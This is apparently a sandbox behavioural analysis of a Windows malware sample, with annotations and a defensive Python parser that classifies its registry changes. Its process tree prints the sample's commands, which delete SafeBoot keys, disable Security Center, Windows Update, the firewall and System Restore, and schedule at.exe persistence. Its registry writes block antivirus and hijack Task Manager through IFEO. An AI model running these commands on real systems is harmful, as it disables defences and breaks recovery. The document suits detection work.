Analysis
  max time kernel:   2s
  max time network:  153s
  platform:          windows10-2004_x64
  resource:          win10v2004-20231222-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20231222-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         09/01/2024, 18:51
Static task: static1
Behavioral task: behavioral1
  Sample:   f329f26f17695afc1155d04b40267702.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2 (this report)
  Sample:   f329f26f17695afc1155d04b40267702.exe
  Resource: win10v2004-20231222-en
General
  Target:  f329f26f17695afc1155d04b40267702.exe
  Size:    778KB
  MD5:     f329f26f17695afc1155d04b40267702
  SHA1:    da158ea773f1f65a2d7e4e4cb149f2802dac88ec
  SHA256:  464bcafd4ce6a5cdabaed206dfb1f1e06e9937602f9eb3b3a781f4adfe06bf67
  SHA512:  789d2406c5978c59727e424a69a35d96c61da8b2e67689149da5359dca6939d47717d3434c53915e4d907a7071029737e14c87e0bb0e4a21ef023618f7bbf32f
  SSDEEP:  6144:UZfec9EbXDk6Rk8KU/UOPSe570Szp3CrG1VVE+I2GFrQZb++tdsHP4+QfI6Uw:UZWtI6RktOB0VuxerQZb+md4w1Uw
Malware Config
Signatures
Modifies visibility of file extensions in Explorer (2 TTPs, 1 IoC)
  Set value (int)  \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"   (process: net.exe)
  With known extensions hidden, a dropped executable whose name imitates a document or folder shows no .exe suffix in Explorer.

Blocks application from running via registry modification (17 IoCs)
  Adds application to list of disallowed applications.
  Key: \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer   (process: net.exe)
    Set value (int)  DisallowRun = "1"          (turns the policy on)
    Key created      DisallowRun                (subkey that holds the list)
    Set value (str)  DisallowRun\1  = "avp.exe"
    Set value (str)  DisallowRun\2  = "RfwMain.exe"
    Set value (str)  DisallowRun\3  = "Rfwsrv.exe"
    Set value (str)  DisallowRun\4  = "RavMoD.exe"
    Set value (str)  DisallowRun\5  = "CCenter.exe"
    Set value (str)  DisallowRun\6  = "RavMon.exe"
    Set value (str)  DisallowRun\7  = "RavStub.exe"
    Set value (str)  DisallowRun\8  = "RavService.exe"
    Set value (str)  DisallowRun\9  = "Rav.exe"
    Set value (str)  DisallowRun\10 = "rfwcfg.exe"
    Set value (str)  DisallowRun\11 = "KPFW32.EXE"
    Set value (str)  DisallowRun\12 = "KPFW32X.EXE"
    Set value (str)  DisallowRun\13 = "KAVPFW.EXE"
    Set value (str)  DisallowRun\14 = "KAV32.EXE"
    Set value (str)  DisallowRun\15 = "KAVStart.EXE"
  Explorer refuses to start any image whose file name is in this list. The policy is enforced by the shell only: it does not stop services, scheduled tasks or a direct CreateProcess. The names are the processes of Kaspersky (avp.exe), Rising antivirus and firewall (Rav*, Rfw*, CCenter.exe) and Kingsoft antivirus and firewall (KAV*, KPFW*) products.

Sets file execution options in registry (2 TTPs, 20 IoCs)
  Key: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options   (process: net.exe)
    Key created for each of:  360Safe.exe, 360tray.exe, avp.exe, KAVStart.EXE, Rav.exe, RavMoD.exe, regedit.exe, RfwMain.exe, Rfwsrv.exe, taskmgr.exe
    Set value (str) <image>\Debugger = "D:\\RECYCLER\\????8.exe" for each of the same ten images
  When IFEO\<image>\Debugger is set, the loader starts the Debugger path instead of the image and appends the original command line to it, so every launch of the listed Kaspersky, Rising, Kingsoft and 360 components, Task Manager and Registry Editor runs the file under D:\RECYCLER in their place. Unlike DisallowRun this applies to every CreateProcess caller, not only the shell. The "????" is how the report renders characters it could not print; the value is reproduced as shown.
  Attribution caveat: the sandbox credits all three registry signatures above to net.exe with PID 3500, but the process tree lists the same PID for "regedit.exe /s C:\Windows\regedt32.sys", a silent .reg import. The PID was reused during the run; the writes match that import, and "net.exe stop wscsvc" does not write these keys.
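The three registry signatures above share one flattened row format. The following Python is an added example, not code from the report or from the sample: it parses rows in that format (a handful copied from this report serve as constructed input) and names the technique each row implements, including the IFEO Debugger redirection described above. The "debugger outside C:\Windows" heuristic is an assumption of the example, not something the report states.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: registry IoC rows copied from the report above.
# The sandbox flattens every table row into one of two shapes:
#   Set value (<type>) <key or value path> = "<data>" <process>
#   Key created <key path> <process>
SAMPLE_ROWS = r"""
Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" net.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "avp.exe" net.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "KPFW32.EXE" net.exe
Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" net.exe
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun net.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe net.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger = "D:\\RECYCLER\\????8.exe" net.exe
"""

SET_RE = re.compile(r'^Set value \((?P<vtype>\w+)\) (?P<path>.+?) = "(?P<data>.*)" (?P<proc>\S+)$')
KEY_RE = re.compile(r'^Key created (?P<path>.+) (?P<proc>\S+)$')

IFEO = "\\image file execution options\\"
DISALLOW_RUN = "\\policies\\explorer\\disallowrun"
HIDE_FILE_EXT = "\\explorer\\advanced\\hidefileext"


@dataclass
class RegOp:
    kind: str             # "set" or "key"
    path: str             # key or value path exactly as the sandbox printed it
    data: Optional[str]   # value data for "set", None for "key"
    proc: str             # process the sandbox attributed the write to


def parse_row(line: str) -> Optional[RegOp]:
    """Turn one flattened report row into a RegOp; None for rows of another shape."""
    line = line.strip()
    m = SET_RE.match(line)
    if m:
        return RegOp("set", m["path"], m["data"], m["proc"])
    m = KEY_RE.match(line)
    if m:
        return RegOp("key", m["path"], None, m["proc"])
    return None


def classify(ops: list) -> dict:
    """Map registry operations to the evasion technique each one implements."""
    out = {
        "ifeo_hijacked": {},          # victim image -> path that now runs in its place
        "suspicious_debuggers": set(),
        "disallow_run": {},           # DisallowRun index -> blocked image name
        "disallow_run_enabled": False,
        "hide_file_ext": False,
    }
    for op in ops:
        low = op.path.lower()
        parts = op.path.split("\\")
        if IFEO in low and op.kind == "set" and parts[-1].lower() == "debugger":
            # IFEO\<image>\Debugger: the loader starts <data> and appends the
            # original command line, so <image> itself never runs.
            out["ifeo_hijacked"][parts[-2]] = op.data
            # Heuristic assumed by this example, not taken from the report: a
            # debugger outside the Windows directory is almost never legitimate.
            if not op.data.lower().startswith("c:\\windows\\"):
                out["suspicious_debuggers"].add(op.data)
        elif low.endswith(DISALLOW_RUN):
            # Policies\Explorer\DisallowRun = 1 is the switch that turns the list on
            if op.kind == "set" and op.data == "1":
                out["disallow_run_enabled"] = True
        elif DISALLOW_RUN + "\\" in low and op.kind == "set":
            # Policies\Explorer\DisallowRun\<n> = "<image>" is one blocked name
            out["disallow_run"][parts[-1]] = op.data
        elif low.endswith(HIDE_FILE_EXT) and op.kind == "set" and op.data == "1":
            out["hide_file_ext"] = True
    return out


def summarize(report_rows: str) -> dict:
    ops = [op for op in (parse_row(l) for l in report_rows.splitlines()) if op]
    return classify(ops)


if __name__ == "__main__":
    s = summarize(SAMPLE_ROWS)
    for victim, debugger in sorted(s["ifeo_hijacked"].items()):
        print(f"IFEO hijack: launching {victim} now runs {debugger}")
    for index, image in sorted(s["disallow_run"].items(), key=lambda kv: int(kv[0])):
        print(f"DisallowRun[{index}] blocks {image}")
    print("DisallowRun enabled:", s["disallow_run_enabled"], "HideFileExt:", s["hide_file_ext"])
```

The same classification applies unchanged to live data: feed it the value paths from Sysmon registry events or from a `reg query` of the two keys, and any non-empty `ifeo_hijacked` whose debugger is not a known debugger install is worth an alert on its own.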
Drops file in System32 directory (1 IoC)
  File created   C:\Windows\SysWOW64\Option.bat   (process: f329f26f17695afc1155d04b40267702.exe)
  The sample is a 32-bit image on x64 Windows, so its write to C:\Windows\system32\ lands in SysWOW64 through WOW64 file-system redirection; the later "cmd.exe /c C:\Windows\system32\Option.bat" resolves to the same file.

Drops file in Windows directory (6 IoCs)   (all by f329f26f17695afc1155d04b40267702.exe)
  File created                  C:\Windows\Sysinf.bat
  File created                  C:\Windows\regedt32.sys
  File created                  C:\Windows\system\KavUpda.exe
  File opened for modification  C:\Windows\system\KavUpda.exe
  File created                  C:\Windows\Help\HelpCat.exe
  File opened for modification  C:\Windows\Help\HelpCat.exe
  regedt32.sys is not a driver: the process tree imports it with "regedit.exe /s", so it is a .reg file under a misleading extension. Sysinf.bat and HelpCat.exe are the targets of the at.exe jobs in the process tree. KavUpda.exe, a name resembling a Kaspersky updater, runs as a child of the sample and repeats the service-stopping and Autorun.inf commands.
Launches sc.exe (8 IoCs)
  sc.exe is a Windows utility to control services on the system.
  PIDs: 2132, 3956, 2792, 1244, 968, 60, 4444, 1416 (sc.exe)

Runs net.exe

Runs regedit.exe (1 IoC)
  PID 3500  regedit.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  PID 3768  f329f26f17695afc1155d04b40267702.exe
Suspicious use of WriteProcessMemory (60 IoCs)
  Each target below was written three times; the sandbox's internal target index is given in parentheses.
  PID 3768 (f329f26f17695afc1155d04b40267702.exe) wrote to: 4168 (16), 2088 (22), 744 (163), 4328 (162), 868 (161), 1976 (159), 2020 (205), 1768 (96), 4144 (95), 3972 (91), 968 (89), 1244 (86), 2792 (82), 3956 (57), 3500 (149), 4604 (273), 3908 (60)
  PID 2088 (net.exe) wrote to: 2588 (18)
  PID 2020 (mousocoreworker.exe) wrote to: 1520 (78)
  PID 4144 (net.exe) wrote to: 3320 (215)
  Every target is a child the writer had just started (see the process tree), which matches the writes CreateProcess itself makes into a new child rather than injection into an unrelated process. The mousocoreworker.exe entry is a PID-reuse artefact: PID 2020 was also "net.exe stop sharedaccess", the real parent of net1 PID 1520.
Views/modifies file attributes (1 TTP, 16 IoCs)
  PIDs: 3176, 4024, 3172, 1968, 2276, 1896, 4220, 2036, 2992, 3900, 4708, 4724, 4912, 5068, 2332, 3660 (attrib.exe)
Processes
  Reading notes: PIDs were reused during the run, so the sandbox attaches some children and signatures to the wrong image. PID 3500 appears as regedit.exe and later as net.exe (the registry signatures belong to the regedit.exe /s import), PID 2020 as net.exe and as mousocoreworker.exe, and several other PIDs (for example 1056, 1228, 2712, 2964, 3320, 3436, 3932, 4604) occur twice. The depth-1 net1.exe, at.exe and attrib.exe entries are children whose parent was not captured; they are the second halves of the net.exe, "cmd /c at" and "cmd /c attrib" commands under the sample and KavUpda.exe.
  What the commands do: reg.exe removes the disk-drive setup class {4D36E967-E325-11CE-BFC1-08002BE10318} from SafeBoot\Minimal and SafeBoot\Network, after which Safe Mode cannot load its disk drivers and fails to boot. sc.exe and net.exe disable and stop Security Center (wscsvc), Windows Update (wuauserv), SharedAccess (Windows Firewall/ICS on XP, ICS only on later Windows), srservice (the XP System Restore service name, absent on Windows 10) and a third-party 360timeprot service. "net start schedule" followed by at.exe schedules C:\Windows\Sysinf.bat and C:\Windows\Help\HelpCat.exe for a few minutes after the run started; at.exe no longer creates jobs on Windows 8 and later, so this persistence only takes effect on the Windows 7 task. The rmdir/attrib pairs strip the attributes from and delete any existing Autorun.inf directory on C: and F:, the usual "vaccination" folder that stops autorun worms from dropping their own Autorun.inf.

[1] PID 3768  C:\Users\Admin\AppData\Local\Temp\f329f26f17695afc1155d04b40267702.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\f329f26f17695afc1155d04b40267702.exe"
    sig: Drops file in System32 directory; Drops file in Windows directory; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  [2] PID 4168  C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c C:\Windows\system32\Option.bat
  [2] PID 2088  C:\Windows\SysWOW64\net.exe
      cmd: net.exe start schedule /y
      sig: Suspicious use of WriteProcessMemory
  [2] PID 3956  C:\Windows\SysWOW64\sc.exe
      cmd: C:\Windows\system32\sc.exe config srservice start= disabled
      sig: Launches sc.exe
  [2] PID 3500  C:\Windows\SysWOW64\regedit.exe
      cmd: regedit.exe /s C:\Windows\regedt32.sys
      sig: Runs regedit.exe
    [3] PID 1780  C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop wscsvc /y
  [2] PID 3908  C:\Windows\SysWOW64\reg.exe
      cmd: C:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f
  [2] PID 4712  C:\Windows\system\KavUpda.exe
      cmd: C:\Windows\system\KavUpda.exe
    [3] PID 928  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
    [3] PID 3932  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
    [3] PID 1488  C:\Windows\SysWOW64\reg.exe
        cmd: C:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f
    [3] PID 1968  C:\Windows\SysWOW64\reg.exe
        cmd: C:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f
    [3] PID 60  C:\Windows\SysWOW64\sc.exe
        cmd: C:\Windows\system32\sc.exe config srservice start= disabled
        sig: Launches sc.exe
    [3] PID 4444  C:\Windows\SysWOW64\sc.exe
        cmd: C:\Windows\system32\sc.exe config wscsvc start= disabled
        sig: Launches sc.exe
    [3] PID 1416  C:\Windows\SysWOW64\sc.exe
        cmd: C:\Windows\system32\sc.exe config SharedAccess start= disabled
        sig: Launches sc.exe
    [3] PID 2132  C:\Windows\SysWOW64\sc.exe
        cmd: C:\Windows\system32\sc.exe config srservice start= disabled
        sig: Launches sc.exe
    [3] PID 3608  C:\Windows\SysWOW64\net.exe
        cmd: net.exe stop 360timeprot /y
    [3] PID 2320  C:\Windows\SysWOW64\net.exe
        cmd: net.exe stop srservice /y
    [3] PID 2964  C:\Windows\SysWOW64\net.exe
        cmd: net.exe stop wuauserv /y
      [4] PID 4024  C:\Windows\SysWOW64\attrib.exe
          cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
          sig: Views/modifies file attributes
    [3] PID 2992  C:\Windows\SysWOW64\net.exe
        cmd: net.exe stop sharedaccess /y
    [3] PID 1056  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 2712  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
    [3] PID 3012  C:\Windows\SysWOW64\net.exe
        cmd: net.exe stop wscsvc /y
    [3] PID 3436  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c at 6:56:47 PM C:\Windows\Sysinf.bat
    [3] PID 1056  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c at 6:53:47 PM C:\Windows\Sysinf.bat
    [3] PID 2364  C:\Windows\SysWOW64\At.exe
        cmd: At.exe 6:54:45 PM C:\Windows\Help\HelpCat.exe
    [3] PID 3932  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
    [3] PID 556  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
    [3] PID 3320  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 2964  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
    [3] PID 2116  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
    [3] PID 4408  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
    [3] PID 3436  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 4460  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
    [3] PID 4608  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
    [3] PID 2612  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
    [3] PID 1676  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 1964  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
    [3] PID 1228  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
      [4] PID 4708  C:\Windows\SysWOW64\attrib.exe
          cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
          sig: Views/modifies file attributes
    [3] PID 2988  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
    [3] PID 440  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 400  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
    [3] PID 1632  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
    [3] PID 3696  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
    [3] PID 2712  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 1228  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
    [3] PID 3248  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
    [3] PID 3172  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
    [3] PID 368  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 4392  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
    [3] PID 2556  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir F:\Autorun.inf /s /q
    [3] PID 1620  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r F:\Autorun.inf\*.* /s /d
      [4] PID 4912  C:\Windows\SysWOW64\attrib.exe
          cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
          sig: Views/modifies file attributes
    [3] PID 4036  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c rmdir C:\Autorun.inf /s /q
    [3] PID 1360  C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c attrib -s -h -r C:\Autorun.inf\*.* /s /d
  [2] PID 4604  C:\Windows\SysWOW64\reg.exe
      cmd: C:\Windows\system32\reg.exe delete "hklm\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}" /f
  [2] PID 2792  C:\Windows\SysWOW64\sc.exe
      cmd: C:\Windows\system32\sc.exe config wscsvc start= disabled
      sig: Launches sc.exe
  [2] PID 1244  C:\Windows\SysWOW64\sc.exe
      cmd: C:\Windows\system32\sc.exe config SharedAccess start= disabled
      sig: Launches sc.exe
  [2] PID 968  C:\Windows\SysWOW64\sc.exe
      cmd: C:\Windows\system32\sc.exe config srservice start= disabled
      sig: Launches sc.exe
  [2] PID 3972  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop 360timeprot /y
  [2] PID 4144  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop srservice /y
      sig: Suspicious use of WriteProcessMemory
  [2] PID 1768  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop wuauserv /y
  [2] PID 2020  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop sharedaccess /y
  [2] PID 3584  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop 360timeprot /y
  [2] PID 1712  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop srservice /y
  [2] PID 592  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop wuauserv /y
  [2] PID 1864  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop sharedaccess /y
  [2] PID 3500  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop wscsvc /y
      sig: Modifies visibility of file extensions in Explorer; Blocks application from running via registry modification; Sets file execution options in registry (see the attribution caveat under Signatures: PID 3500 was earlier regedit.exe)
  [2] PID 1976  C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop wscsvc /y
  [2] PID 868  C:\Windows\SysWOW64\cmd.exe
      cmd: cmd /c at 6:56:44 PM C:\Windows\Sysinf.bat
  [2] PID 4328  C:\Windows\SysWOW64\cmd.exe
      cmd: cmd /c at 6:53:44 PM C:\Windows\Sysinf.bat
  [2] PID 744  C:\Windows\SysWOW64\At.exe
      cmd: At.exe 6:54:42 PM C:\Windows\Help\HelpCat.exe
[1] PID 2588  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 start schedule /y
[1] PID 3320  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop srservice /y
[1] PID 4516  C:\Windows\SysWOW64\at.exe
    cmd: at 6:53:44 PM C:\Windows\Sysinf.bat
[1] PID 1416  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop wscsvc /y
[1] PID 4536  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 start schedule /y
[1] PID 1900  C:\Windows\SysWOW64\net.exe
    cmd: net.exe start schedule /y
[1] PID 4428  C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c C:\Windows\system32\Option.bat
[1] PID 1468  C:\Windows\SysWOW64\at.exe
    cmd: at 6:56:44 PM C:\Windows\Sysinf.bat
[1] PID 1688  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop wuauserv /y
[1] PID 1820  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop 360timeprot /y
[1] PID 1520  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop sharedaccess /y
[1] PID 3176  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 2364  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop srservice /y
[1] PID 3012  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop 360timeprot /y
  [2] PID 3592  C:\Windows\SysWOW64\net1.exe
      cmd: C:\Windows\system32\net1 stop wscsvc /y
[1] PID 2344  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop wuauserv /y
[1] PID 4064  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop srservice /y
[1] PID 4244  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop wuauserv /y
[1] PID 3592  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop sharedaccess /y
[1] PID 956  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop 360timeprot /y
[1] PID 3964  C:\Windows\SysWOW64\at.exe
    cmd: at 6:56:47 PM C:\Windows\Sysinf.bat
[1] PID 4360  C:\Windows\SysWOW64\at.exe
    cmd: at 6:53:47 PM C:\Windows\Sysinf.bat
[1] PID 1780  C:\Windows\SysWOW64\net1.exe
    cmd: C:\Windows\system32\net1 stop sharedaccess /y
[1] PID 4220  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 2020  C:\Windows\System32\mousocoreworker.exe
    cmd: C:\Windows\System32\mousocoreworker.exe -Embedding
    sig: Suspicious use of WriteProcessMemory (PID-reuse artefact; see the WriteProcessMemory signature)
[1] PID 5068  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 2036  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 3172  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
  [2] PID 4724  C:\Windows\SysWOW64\attrib.exe
      cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
      sig: Views/modifies file attributes
[1] PID 2992  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 2332  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 1968  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 3660  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 3900  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r F:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 4604  C:\Windows\System32\Conhost.exe
    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[1] PID 2276  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes
[1] PID 1896  C:\Windows\SysWOW64\attrib.exe
    cmd: attrib -s -h -r C:\Autorun.inf\*.* /s /d
    sig: Views/modifies file attributes